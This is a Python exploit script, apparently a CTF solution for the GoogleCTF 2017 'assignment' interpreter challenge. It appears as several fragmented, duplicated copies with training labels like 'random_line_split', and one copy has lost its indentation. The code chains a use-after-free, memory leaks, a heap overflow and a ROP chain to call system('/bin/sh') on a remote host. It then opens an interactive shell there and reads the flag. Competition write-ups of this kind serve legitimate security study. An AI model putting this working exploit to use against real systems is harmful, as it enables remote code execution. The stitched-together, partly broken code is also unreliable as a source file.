# Your code here
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ALPHABET = 'abcdefghijklmnopqrstuvwxyz'
def evl(code):
sendline(code)
def readvar(name):
evl('=')
recvtil('Bad token: 0-1\n> ')
evl(name)
response = recvtil('> ')
return response.split(b'\n')[0]
def readintvar(name):
return int(d(readvar(name)))
def readstrvar(name):
return readvar(name)[1:-1]
def heapleak():
"""Free the lhs and rhs values during add_assign. ..."""
for i in range(16):
evl('{}'.format(i))
# Trigger heap info leak
evl('h=0+0')
return readintvar('h') & 0xfffffffffffff000
def gc(remaining):
"""Trigger gargabe collection"""
for i in range(remaining):
evl('{}'.format(i))
def leak(addr, length):
"""Leaks process memory by abusing the UAF to temporarily inject a fake string."""
fake_str_addr = heap_base + 0xb0
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(15):
evl('{}'.format(i))
# 19 slots filled
# allocate 20th slot with integer value containing the addr of our fake string. The allocate_value() during do_add_assign triggers GC and frees the lhs value
# Then the output value is allocated into the same slot. Since the output value is String (type of x),
# lhs is turned into a string with controlled pointer
evl('a={}+x'.format(fake_str_addr))
gc(16)
return readstrvar('a')[0:length]
def leak2(addr, length):
"""Same as above, but different offsets..."""
fake_str_addr = heap_base + 0x170
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(12):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
return readstrvar('a')[0:length]
def pwn():
global heap_base
recvtil('>')
evl('x="XXXXXXXXXXXXXXXX"') # Workaround, need global object or else GC will crash
# 2 slots always filled from now on (global object and int value 1337)
heap_base = heapleak()
# 3 slots always filled from now on
print_good("Heap base @ 0x{:x}".format(heap_base))
# Create a smallbin chunk so we can leak a libc pointer
evl('"{}"'.format('A' * 0x100))
gc(20 - 4)
# Leak freelist pointers pointing into the libc
heap_mem = leak(heap_base, 0x1000)
for i in range(0, len(heap_mem)-16, 8):
# Search for 2 consecutive pointers, those will be the flink and blink of the freed smallbin chunk
flink = u64(heap_mem[i:i+8])
blink = u64(heap_mem[i+8:i+16])
if (abs(flink - heap_base) > 0x10000 and
flink > 0x7f0000000000 and
flink < 0x800000000000 and
blink > 0x7f0000000000 and
blink < 0x800000000000):
break
else:
print_bad("No freelist pointers found :(")
return
libc = flink - 0x3c1928
print_good("libc @ 0x{:x}".format(libc))
# Leak stack pointer by reading environ pointer in libc
env_ptr = u64(leak2(libc + 0x3c44a0, 8))
print_good("stack @ 0x{:x}".format(env_ptr))
# Calculate addresses
system = libc + 0x46590
bin_sh = libc + 0x180103
pop_rdi = libc + 0x22b9a
pop_rsi = libc + 0x24885
pop_rdx = libc + 0x1b8e
add_rsp_0x48 = libc + 0xf5b8b
print_good("/bin/sh @ 0x{:x}".format(bin_sh))
input_buf = env_ptr - 0x328
print_good("input_buf @ 0x{:x}".format(input_buf))
ret_addr = env_ptr - 0x328 - 8
print_good("return address @ 0x{:x}".format(ret_addr))
# 5 slots always filled from now
#
# Heap spray with Property instances to get a controlled heap layout again
#
# Make some objects
evl('l.a=x')
evl('h.a=x')
evl('a.a=x')
evl('b.a=x')
evl('c.a=x')
evl('d.a=x')
evl('e.a=x')
evl('f.a=x')
# Trigger GC
for i in range(9):
evl('"{}"'.format('A' * 0x10))
evl('1337')
# 10 slots used
# Allocate lots of properties (but no values)
for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
for p in ALPHABET:
evl('{}.{}=x'.format(o, p))
# Set up heap layout for unbounded heap overflow. We need the following layout:
# | chunk to overflow from | ... | Property to corrupt | ... | Fake string |
# We overflow into "Fake string" to set it's size to 0 and avoid a segfault.
for i in range(6):
evl('1337')
# Create some properties
for i in 'ghijk':
evl('{}=x'.format(i))
# Fake string with length 0xffffffXX => leads to an integer overflow during string_concat and subsequently a heap buffer overflow
fake_str = p64(0xffffffffffffffff - 0xf - (0x180 - 0x10)) + p64(0x414141414141) + b'D'*0xf0
evl(b'n="' + fake_str + b'"')
payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 0x100) +p64(input_buf-7)
payload += b'\x00' * (0x180 - len(payload))
evl(b'o="' + payload + b'"')
fake_str_addr = heap_base + 0x1e80
# Trigger the overflow
evl('p=o+{}'.format(fake_str_addr))
# Set up a fake string property in the stack ('p' points to it). We need to leak the binary base from the return address
payload = b'A' * 0x100
payload += p64(1) + p64(input_buf + 16 + 0x100 + 0x18) + p64(0)
payload += p64(8) + p64(ret_addr)
evl(payload)
binary = readstrvar('p')
binary = u64(binary) - 2769
print_good("binary @ 0x{:x}".format(binary))
offset_to_ret = ret_addr - (input_buf & 0xffffffffffffff00)
print_good("offset to return address: 0x{:x}".format(offset_to_ret))
# Some unfortunate restrictions...
if offset_to_ret > 0x28 or offset_to_ret < 0:
print_bad("Bad offset")
return
prop_name = p64(binary + 0xAC9)[1]
if prop_name < ord('A') or prop_name > ord('z'):
print_bad("Bad propery name: {}".format(prop_name))
return
prop_name = chr(prop_name)
print_good("property name: {}".format(prop_name))
# Write ROP chain into stack
payload = b'A' * 56
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system)
validate(payload, [b'\n'])
evl(payload)
# Trigger corruption of InputBuffer.ptr to point further down in the stack
evl('{}=42'.format(prop_name))
# Next input will be written into the stack frame of readline(). Overwrite the return address with "add rsp, 0x48 ; ret"
payload = b'A'*offset_to_ret
payload += p64(add_rsp_0x48)
validate(payload, [b'\n'])
evl(payload)
# Wait a short while and drop into interactive mode == shell
time.sleep(0.5)
interact()
if __name__ == '__main__':
pwn()
| elf._seq = self._generate(3)[:length]
| conditional_block |
snippet.py | #!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a
# pointer into the heap by confusing an Integer Value with a Property. It then
# abuses the UAF differently to create a fake String instance which is
# concatenated and returned. By faking a String in the heap, we can read
# arbitrary memory. We leak the addresses of libc and the stack. Next the
# exploit does some heap feng shui, then fakes a string with length 0xffffffXX,
# which triggers an integer overflow during string_concat(). This gives us a
# heap-based buffer overflow. With that we first corrupt a Property to point
# into the stack, then overwrite the length of the fake string with 0 to stop
# the memcpy. We leak the address of the binary from the return address. Next
# we write a value to the fake property. This writes a pointer to the heap into
# the stack. With that we corrupt only the first byte of the input buffer
# pointer so it now points further down into the stack. The next call to
# readline() by the application then writes into the stack frame of readline()
# and ultimately overwrites the return address => we get ROP:
#
# [+] Heap base @ 0x55cd3d465000
# [+] libc @ 0x7f7ea1f79000
# [+] stack @ 0x7ffcf044f448
# [+] /bin/sh @ 0x7f7ea20f9103
# [+] input_buf @ 0x7ffcf044f120
# [+] return address @ 0x7ffcf044f118
# [+] binary @ 0x55cd3c696000
# [+] offset to return address: 0x18
# [+] property name: j
# id
# uid=1337(user) gid=1337(user) groups=1337(user)
# ls
# assignment
# flag.txt
# cat flag.txt
# CTF{d0nT_tHrOw_0u7_th1nG5_yoU_5ti11_u53}
#
# Author: Samuel <saelo> Groß
#
import socket
import termios
import tty
import time
import sys
import select
import os
import re
import telnetlib
import string
from struct import pack, unpack
from binascii import hexlify, unhexlify
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#TARGET = ('localhost', 4444)
TARGET = ('assignment.ctfcompetition.com', 1337)
# Enable "wireshark" mode, pretty prints all incoming and outgoing network traffic.
NETDEBUG = False
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Encoding and Packing
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def e(d):
    """Return the given str instance converted to bytes via the UTF-8 codec."""
    return bytes(d, 'UTF-8')
def d(d):
    """Return the given bytes-like instance converted to str via the UTF-8 codec."""
    return str(d, 'UTF-8')
def p32(d):
    """Serialize the integer d into its 4-byte little-endian unsigned representation."""
    packed = pack('<I', d)
    return packed
def u32(d):
    """Deserialize the 4-byte buffer d as a little-endian unsigned 32-bit integer."""
    (value,) = unpack('<I', d)
    return value
def p64(d):
    """Serialize the integer d into its 8-byte little-endian unsigned representation."""
    packed = pack('<Q', d)
    return packed
def u64(d):
    """Deserialize the 8-byte buffer d as a little-endian unsigned 64-bit integer."""
    (value,) = unpack('<Q', d)
    return value
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Output
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def print_good(msg):
    """Print a success message ('[+] ...') in bold via ANSI escapes."""
    print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))

def print_bad(msg):
    """Print a failure message ('[-] ...') in magenta via ANSI escapes."""
    print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))

def print_info(msg):
    """Print a neutral informational message ('[*] ...')."""
    print('[*] ' + msg)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Misc.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def bytes_and_strings_are_cool(func):
    """Decorator that UTF-8-encodes every str argument before calling func.

    Non-str arguments (bytes, ints, ...) are passed through unchanged, so the
    decorated function only ever sees bytes where the caller supplied text.

    Bug fix: the original built nkwargs with
    `dict(map(lambda k, v: ..., kwargs))`, which iterates only the dict's
    KEYS and calls the two-argument lambda with a single argument -- a
    TypeError whenever keyword arguments were actually passed. Iterate over
    kwargs.items() instead.
    """
    def inner(*args, **kwargs):
        nargs = tuple(e(arg) if isinstance(arg, str) else arg for arg in args)
        nkwargs = {k: e(v) if isinstance(v, str) else v for k, v in kwargs.items()}
        return func(*nargs, **nkwargs)
    return inner
def validate(data, badchars):
    """Raise AssertionError if any of the given badchars occurs in data."""
    for bad in badchars:
        assert bad not in data
def is_printable(b):
    """Return true if the given byte value is a printable ASCII character.

    Note: string.printable includes whitespace (space, tab, newline, ...).
    """
    return b in string.printable.encode('UTF-8')
def hexdump(data):
    """Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
    def is_hexdump_printable(b):
        return b in b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
    lines = []
    for offset in range(0, len(data), 16):
        chunk = data[offset:offset + 16]
        hexbytes = ['{:02x}'.format(b) for b in chunk]
        left = ' '.join(hexbytes[:8])
        right = ' '.join(hexbytes[8:])
        text = ''.join(chr(b) if is_hexdump_printable(b) else '.' for b in chunk)
        lines.append('{:08x} {:23} {:23} |{}|'.format(offset, left, right, text))
    return '\n'.join(lines)
class Term:
    """ANSI terminal escape-code constants.

    The COLOR_*/CLEAR/UNDERLINE/BOLD values are SGR parameter strings; they
    are combined by ansi() between ESCAPE_START ('\\033[') and ESCAPE_END ('m').
    """
    COLOR_BLACK = '30'
    COLOR_RED = '31'
    COLOR_GREEN = '32'
    COLOR_BROWN = '33'
    COLOR_BLUE = '34'
    COLOR_MAGENTA = '35'
    COLOR_CYAN = '36'
    COLOR_WHITE = '37'
    CLEAR = '0'
    UNDERLINE = '4'
    BOLD = '1'
    ESCAPE_START = '\033['
    ESCAPE_END = 'm'
# TODO rename to style and append Term.Clear ?
def ansi(*args):
    """Construct an ANSI terminal escape code from the given SGR parameters."""
    return Term.ESCAPE_START + ';'.join(args) + Term.ESCAPE_END
class DisconnectException(Exception):
    """Raised by Channel.recv when the remote end has closed the connection."""
    pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Pattern Generation
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Pattern:
"""De-Bruijn sequence generator."""
alphabet = string.digits + string.ascii_letters
def __init__(self, length):
if length <= len(self.alphabet):
self._seq = self.alphabet[:length]
elif length <= len(self.alphabet) ** 2:
self._seq = self._generate(2)[:length]
elif length <= len(self.alphabet) ** 3:
self._seq = self._generate(3)[:length]
elif length <= len(self.alphabet) ** 4:
self._seq = self._generate(4)[:length]
else:
raise Exception("Pattern length is way to large")
def _generate(self, n):
"""Generate a De Bruijn sequence."""
# See https://en.wikipedia.org/wiki/De_Bruijn_sequence
k = len(self.alphabet)
a = [0] * k * n
sequence = []
| if t > n:
if n % p == 0:
sequence.extend(a[1:p + 1])
else:
a[t] = a[t - p]
db(t + 1, p)
for j in range(a[t - p] + 1, k):
a[t] = j
db(t + 1, t)
db(1, 1)
return ''.join(self.alphabet[i] for i in sequence)
    def bytes(self):
        """Return this sequence as bytes (UTF-8 encoded)."""
        return e(self._seq)
    def __str__(self):
        """Return this sequence as string."""
        return self._seq
    @bytes_and_strings_are_cool
    def offset(self, needle):
        """Returns the index of 'needle' in this sequence.
        'needle' should be of type string or bytes. If an integer is provided
        it will be treated as 32-bit or 64-bit little endian number, depending
        on its bit length.
        Raises ValueError if the needle occurs more than once.
        """
        if isinstance(needle, int):
            # Pack the integer into its little-endian byte form first.
            if needle.bit_length() <= 32:
                needle = p32(needle)
            else:
                needle = p64(needle)
        # The decorator converted str needles to bytes; _seq is a str, so
        # decode before searching.
        needle = d(needle)
        idx = self._seq.index(needle)
        # Reject ambiguous needles: a second occurrence would make the offset meaningless.
        if self._seq[idx+len(needle):].find(needle) != -1:
            raise ValueError("Multiple occurances found!")
        return idx
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Network
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Channel:
    """Convenience wrapper around a socket.

    Buffers incoming data internally and optionally pretty-prints all traffic
    in both directions ("wireshark mode", see _prettyprint).
    """
    # SGR color parameters used by _prettyprint per traffic direction.
    OUTGOING_COLOR = Term.COLOR_RED
    INCOMING_COLOR = Term.COLOR_BLUE

    def __init__(self, sock, verbose):
        self._s = sock
        self._verbose = verbose
        self._buf = bytearray()  # received but not yet consumed bytes

    def _prettyprint(self, data, outgoing):
        """Prettyprint the given data.
        This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
        Everything else is converted to hex, then printed in bold and underline for visibility.
        Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
        detected in arbitrary binary streams.
        """
        TEXT = 0
        BINARY = 1
        # Various Thresholds for the heuristics below
        X = 4
        Y = 16
        Z = 2
        color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
        # Step 1: Tag every byte of the input stream with it's detected type.
        parts = []
        curr = ''  # NOTE(review): unused local, kept as-is
        for b in data:
            if is_printable(b):
                parts.append((TEXT, b))
            else:
                parts.append((BINARY, b))
        # Step 2: Merge neighboring bytes of the same type and convert the sequences to type bytes.
        i = 0
        mergedparts = []
        while i < len(parts):
            t = parts[i][0]
            arr = [parts[i][1]]
            j = i+1
            while j < len(parts) and parts[j][0] == t:
                arr.append(parts[j][1])
                j += 1
            i = j
            # Heuristic: If there are Y ASCII bytes with the same value followed by Z ASCII bytes followed by binary data, treat the Z bytes as binary as well.
            extra = []
            if t == TEXT and len(arr) > Y and i < len(parts) - 1:
                mid = len(arr) - Z - 1
                start, end = mid, mid
                char = arr[mid]
                while start >= 0 and arr[start] == char:
                    start -= 1
                while end < len(arr) and arr[end] == char:
                    end += 1
                # start and end point outside the range of equal-valued characters now.
                # NOTE(review): `end < len(parts)` compares an index into arr
                # against the length of parts -- looks suspicious; confirm intent.
                if end - start >= Y+2 and end < len(parts):
                    extra = arr[end:]
                    arr = arr[:end]
            mergedparts.append((t, bytes(arr)))
            if extra:
                mergedparts.append((BINARY, bytes(extra)))
        parts = mergedparts
        # Step 3: Merge all parts and prepend the ansi terminal escape sequences for the given type.
        buf = ''
        last = None
        for tag, value in parts:
            # Heuristic: If there is an ASCII sequence of X bytes or less surrounded by binary data, treat those as binary as well.
            if tag == TEXT and len(value) <= X and last == BINARY:
                tag = BINARY
            if tag == TEXT:
                buf += ansi(Term.CLEAR) + ansi(color)
            else:
                buf += ansi(color, Term.BOLD, Term.UNDERLINE)
                value = hexlify(value)
            buf += d(value)
            last = tag
        buf += ansi(Term.CLEAR)
        # Step 4: Print :)
        print(buf, end='')
        sys.stdout.flush()

    def setVerbose(self, verbose):
        """Set verbosity of this channel."""
        self._verbose = verbose

    def recv(self, n=4096):
        """Return up to n bytes of data from the remote end.
        Buffers incoming data internally.
        NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
        """
        if len(self._buf) < n:
            buf = self._s.recv(65536)
            if not buf and not self._buf:
                # Empty read with an empty buffer: the peer closed the connection.
                raise DisconnectException("Server disconnected.")
            if self._verbose:
                self._prettyprint(buf, False)
            self._buf += buf
        # This code also works if n > len(self._buf)
        buf = self._buf[:n]
        self._buf = self._buf[n:]
        return buf

    def recvn(self, n):
        """Return exactly n bytes of data from the remote end."""
        data = []
        while len(data) != n:
            data.append(self.recv(1))
        return b''.join(data)

    @bytes_and_strings_are_cool
    def recvtil(self, delim):
        """Read data from the remote end until delim is found in the data.
        The first occurrence of delim is included in the returned buffer.
        """
        buf = b''
        # TODO maybe not make this O(n**2)...
        while not delim in buf:
            buf += self.recv(1)
        return buf

    def recvregex(self, regex):
        """Receive incoming data until it matches the given regex.
        Returns the match object.
        IMPORTANT: Since the data is coming from the network, it's usually
        a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
        will return as soon as 'addr: 0xf' is read. Instead, make sure to
        end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
        """
        if isinstance(regex, str):
            regex = re.compile(regex)
        buf = ''
        match = None
        while not match:
            buf += d(self.recv(1))
            match = regex.search(buf)
        return match

    def recvline(self):
        """Receive and return a line from the remote end.
        The trailing newline character will be included in the returned buffer.
        """
        return self.recvtil('\n')

    def send(self, buf):
        """Send all data in buf to the remote end."""
        if self._verbose:
            self._prettyprint(buf, True)
        self._s.sendall(buf)

    def sendnum(self, n):
        """Send the string representation of n followed by a newline character."""
        self.sendline(str(n))

    @bytes_and_strings_are_cool
    def sendline(self, l):
        """Append a newline to l and send everything to the remote end."""
        self.send(l + b'\n')

    def interact(self):
        """Interact with the remote end: connect stdout and stdin to the socket."""
        # TODO maybe use this at some point: https://docs.python.org/3/library/selectors.html
        self._verbose = False
        try:
            while True:
                available, _, _ = select.select([sys.stdin, self._s], [], [])
                for src in available:
                    if src == sys.stdin:
                        data = sys.stdin.buffer.read1(1024) # Only one read() call, otherwise this breaks when the tty is in raw mode
                        self.send(data)
                    else:
                        data = self.recv(4096)
                        sys.stdout.buffer.write(data)
                        sys.stdout.flush()
        except KeyboardInterrupt:
            return
        except DisconnectException:
            print_info("Server disconnected.")
            return
#
# Telnet emulation
#
def telnet(shell='/bin/bash'):
    """Telnet emulation.
    Opens a PTY on the remote end and connects the master side to the socket.
    Then spawns a shell connected to the slave end and puts the controlling TTY
    on the local machine into raw mode.
    Result: Something similar to a telnet/(plaintext)ssh session.
    Vim, htop, su, less, etc. will work with this.
    !!! This function only works if the channel is connected to a shell !!!
    """
    assert(sys.stdin.isatty())
    c.setVerbose(False)
    # Open a PTY and spawn a bash connected to the slave end on the remote side
    code = 'import pty; pty.spawn([\'{}\', \'-i\'])'.format(shell)
    sendline('python -c "{}"; exit'.format(code))
    time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...
    # Should maybe put some more functionality into the inline python code instead.
    # Save current TTY settings
    old_settings = termios.tcgetattr(sys.stdin.fileno())
    # Put TTY into raw mode
    tty.setraw(sys.stdin)
    # Resize remote terminal
    # Nice-to-have: also handle terminal resize
    cols, rows = os.get_terminal_size(sys.stdin.fileno())
    sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
    recvtil('READY\r\n') # terminal echo
    recvtil('READY\r\n') # command output
    interact()
    # Restore previous settings
    termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
#
# Convenience wrappers that use the global socket instance
#
def send(b):
    """Module-level wrapper: send raw bytes via the global channel `c`."""
    c.send(b)

def sendline(l):
    """Module-level wrapper: send l plus a trailing newline via `c`."""
    c.sendline(l)

def sendnum(n):
    """Module-level wrapper: send str(n) plus a newline via `c`."""
    c.sendnum(n)

def recv(n):
    """Module-level wrapper: receive up to n bytes via `c`."""
    return c.recv(n)

def recvtil(delim):
    """Module-level wrapper: receive until (and including) delim via `c`."""
    return c.recvtil(delim)

def recvn(n):
    """Module-level wrapper: receive exactly n bytes via `c`."""
    return c.recvn(n)

def recvline():
    """Module-level wrapper: receive one line (newline included) via `c`."""
    return c.recvline()

def recvregex(r):
    """Module-level wrapper: receive until the regex r matches via `c`."""
    return c.recvregex(r)

def interact():
    """Module-level wrapper: hand stdin/stdout over to the socket via `c`."""
    c.interact()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Setup
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
s = socket.create_connection(TARGET)  # global TCP connection to the challenge server
#s.settimeout(2)
c = Channel(s, NETDEBUG)  # global channel instance used by the module-level wrappers
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Your code here
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ALPHABET = 'abcdefghijklmnopqrstuvwxyz'  # property names used by the heap spray in pwn()

def evl(code):
    """Send one line of code to the target's interpreter (fire-and-forget)."""
    sendline(code)

def readvar(name):
    """Read back the printed value of variable `name` from the target.

    Sends a bare '=' first; the interpreter's 'Bad token' error gives a known
    marker to resynchronize the stream on before echoing the variable.
    """
    evl('=')
    recvtil('Bad token: 0-1\n> ')
    evl(name)
    response = recvtil('> ')
    return response.split(b'\n')[0]

def readintvar(name):
    """Read variable `name` and parse its printed form as an int."""
    return int(d(readvar(name)))

def readstrvar(name):
    """Read variable `name`, dropping the first and last byte of the output
    (presumably the quotes around string values -- confirm against target)."""
    return readvar(name)[1:-1]
def heapleak():
    """Free the lhs and rhs values during add_assign. ...

    Returns the page-aligned heap base address leaked through the confused
    Integer/Property value.
    """
    # Allocate throwaway integer values so the add_assign below triggers a GC
    # (see the slot bookkeeping comments in pwn()).
    for i in range(16):
        evl('{}'.format(i))
    # Trigger heap info leak
    evl('h=0+0')
    # Mask off the low 12 bits to page-align the leaked pointer.
    return readintvar('h') & 0xfffffffffffff000

def gc(remaining):
    """Trigger garbage collection by allocating `remaining` integer values."""
    for i in range(remaining):
        evl('{}'.format(i))
def leak(addr, length):
    """Leaks process memory by abusing the UAF to temporarily inject a fake string."""
    fake_str_addr = heap_base + 0xb0
    # Fake String header: (length, data pointer) -- read back below as a string.
    fake_str = p64(length) + p64(addr)
    evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
    for i in range(15):
        evl('{}'.format(i))
    # 19 slots filled
    # allocate 20th slot with integer value containing the addr of our fake string. The allocate_value() during do_add_assign triggers GC and frees the lhs value
    # Then the output value is allocated into the same slot. Since the output value is String (type of x),
    # lhs is turned into a string with controlled pointer
    evl('a={}+x'.format(fake_str_addr))
    gc(16)
    return readstrvar('a')[0:length]

def leak2(addr, length):
    """Same as above, but different offsets..."""
    fake_str_addr = heap_base + 0x170
    fake_str = p64(length) + p64(addr)
    evl(b'l="' + fake_str + b'"') # will be at offset 0x170 from heap start (fixed stale copy-pasted '0xb0')
    for i in range(12):
        evl('{}'.format(i))
    evl('a={}+x'.format(fake_str_addr))
    return readstrvar('a')[0:length]
def pwn():
    """Run the full exploit chain against the connected target:
    heap leak -> libc leak -> stack leak -> heap overflow -> ROP -> shell.
    All libc offsets below are specific to the target's libc build.
    """
    global heap_base
    recvtil('>')
    evl('x="XXXXXXXXXXXXXXXX"') # Workaround, need global object or else GC will crash
    # 2 slots always filled from now on (global object and int value 1337)
    heap_base = heapleak()
    # 3 slots always filled from now on
    print_good("Heap base @ 0x{:x}".format(heap_base))
    # Create a smallbin chunk so we can leak a libc pointer
    evl('"{}"'.format('A' * 0x100))
    gc(20 - 4)
    # Leak freelist pointers pointing into the libc
    heap_mem = leak(heap_base, 0x1000)
    for i in range(0, len(heap_mem)-16, 8):
        # Search for 2 consecutive pointers, those will be the flink and blink of the freed smallbin chunk
        flink = u64(heap_mem[i:i+8])
        blink = u64(heap_mem[i+8:i+16])
        if (abs(flink - heap_base) > 0x10000 and
                flink > 0x7f0000000000 and
                flink < 0x800000000000 and
                blink > 0x7f0000000000 and
                blink < 0x800000000000):
            break
    else:
        # for/else: only reached if the loop finished without `break`.
        print_bad("No freelist pointers found :(")
        return
    libc = flink - 0x3c1928
    print_good("libc @ 0x{:x}".format(libc))
    # Leak stack pointer by reading environ pointer in libc
    env_ptr = u64(leak2(libc + 0x3c44a0, 8))
    print_good("stack @ 0x{:x}".format(env_ptr))
    # Calculate addresses
    system = libc + 0x46590
    bin_sh = libc + 0x180103
    pop_rdi = libc + 0x22b9a
    pop_rsi = libc + 0x24885
    pop_rdx = libc + 0x1b8e
    add_rsp_0x48 = libc + 0xf5b8b
    print_good("/bin/sh @ 0x{:x}".format(bin_sh))
    input_buf = env_ptr - 0x328
    print_good("input_buf @ 0x{:x}".format(input_buf))
    ret_addr = env_ptr - 0x328 - 8
    print_good("return address @ 0x{:x}".format(ret_addr))
    # 5 slots always filled from now
    #
    # Heap spray with Property instances to get a controlled heap layout again
    #
    # Make some objects
    evl('l.a=x')
    evl('h.a=x')
    evl('a.a=x')
    evl('b.a=x')
    evl('c.a=x')
    evl('d.a=x')
    evl('e.a=x')
    evl('f.a=x')
    # Trigger GC
    for i in range(9):
        evl('"{}"'.format('A' * 0x10))
    evl('1337')
    # 10 slots used
    # Allocate lots of properties (but no values)
    for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
        for p in ALPHABET:
            evl('{}.{}=x'.format(o, p))
    # Set up heap layout for unbounded heap overflow. We need the following layout:
    #     | chunk to overflow from | ... | Property to corrupt | ... | Fake string |
    # We overflow into "Fake string" to set it's size to 0 and avoid a segfault.
    for i in range(6):
        evl('1337')
    # Create some properties
    for i in 'ghijk':
        evl('{}=x'.format(i))
    # Fake string with length 0xffffffXX => leads to an integer overflow during string_concat and subsequently a heap buffer overflow
    fake_str = p64(0xffffffffffffffff - 0xf - (0x180 - 0x10)) + p64(0x414141414141) + b'D'*0xf0
    evl(b'n="' + fake_str + b'"')
    payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 0x100) +p64(input_buf-7)
    payload += b'\x00' * (0x180 - len(payload))
    evl(b'o="' + payload + b'"')
    fake_str_addr = heap_base + 0x1e80
    # Trigger the overflow
    evl('p=o+{}'.format(fake_str_addr))
    # Set up a fake string property in the stack ('p' points to it). We need to leak the binary base from the return address
    payload = b'A' * 0x100
    payload += p64(1) + p64(input_buf + 16 + 0x100 + 0x18) + p64(0)
    payload += p64(8) + p64(ret_addr)
    evl(payload)
    binary = readstrvar('p')
    binary = u64(binary) - 2769
    print_good("binary @ 0x{:x}".format(binary))
    offset_to_ret = ret_addr - (input_buf & 0xffffffffffffff00)
    print_good("offset to return address: 0x{:x}".format(offset_to_ret))
    # Some unfortunate restrictions...
    if offset_to_ret > 0x28 or offset_to_ret < 0:
        print_bad("Bad offset")
        return
    prop_name = p64(binary + 0xAC9)[1]
    if prop_name < ord('A') or prop_name > ord('z'):
        print_bad("Bad propery name: {}".format(prop_name))
        return
    prop_name = chr(prop_name)
    print_good("property name: {}".format(prop_name))
    # Write ROP chain into stack
    payload = b'A' * 56
    payload += p64(pop_rdi)
    payload += p64(bin_sh)
    payload += p64(system)
    validate(payload, [b'\n'])
    evl(payload)
    # Trigger corruption of InputBuffer.ptr to point further down in the stack
    evl('{}=42'.format(prop_name))
    # Next input will be written into the stack frame of readline(). Overwrite the return address with "add rsp, 0x48 ; ret"
    payload = b'A'*offset_to_ret
    payload += p64(add_rsp_0x48)
    validate(payload, [b'\n'])
    evl(payload)
    # Wait a short while and drop into interactive mode == shell
    time.sleep(0.5)
    interact()
if __name__ == '__main__':
pwn() | def db(t, p): | random_line_split |
snippet.py | #!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a
# pointer into the heap by confusing an Integer Value with a Property. It then
# abuses the UAF differently to create a fake String instance which is
# concatenated and returned. By faking a String in the heap, we can read
# arbitrary memory. We leak the addresses of libc and the stack. Next the
# exploit does some heap feng shui, then fakes a string with length 0xffffffXX,
# which triggers an integer overflow during string_concat(). This gives us a
# heap-based buffer overflow. With that we first corrupt a Property to point
# into the stack, then overwrite the length of the fake string with 0 to stop
# the memcpy. We leak the address of the binary from the return address. Next
# we write a value to the fake property. This writes a pointer to the heap into
# the stack. With that we corrupt only the first byte of the input buffer
# pointer so it now points further down into the stack. The next call to
# readline() by the application then writes into the stack frame of readline()
# and ultimately overwrites the return address => we get ROP:
#
# [+] Heap base @ 0x55cd3d465000
# [+] libc @ 0x7f7ea1f79000
# [+] stack @ 0x7ffcf044f448
# [+] /bin/sh @ 0x7f7ea20f9103
# [+] input_buf @ 0x7ffcf044f120
# [+] return address @ 0x7ffcf044f118
# [+] binary @ 0x55cd3c696000
# [+] offset to return address: 0x18
# [+] property name: j
# id
# uid=1337(user) gid=1337(user) groups=1337(user)
# ls
# assignment
# flag.txt
# cat flag.txt
# CTF{d0nT_tHrOw_0u7_th1nG5_yoU_5ti11_u53}
#
# Author: Samuel <saelo> Groß
#
import socket
import termios
import tty
import time
import sys
import select
import os
import re
import telnetlib
import string
from struct import pack, unpack
from binascii import hexlify, unhexlify
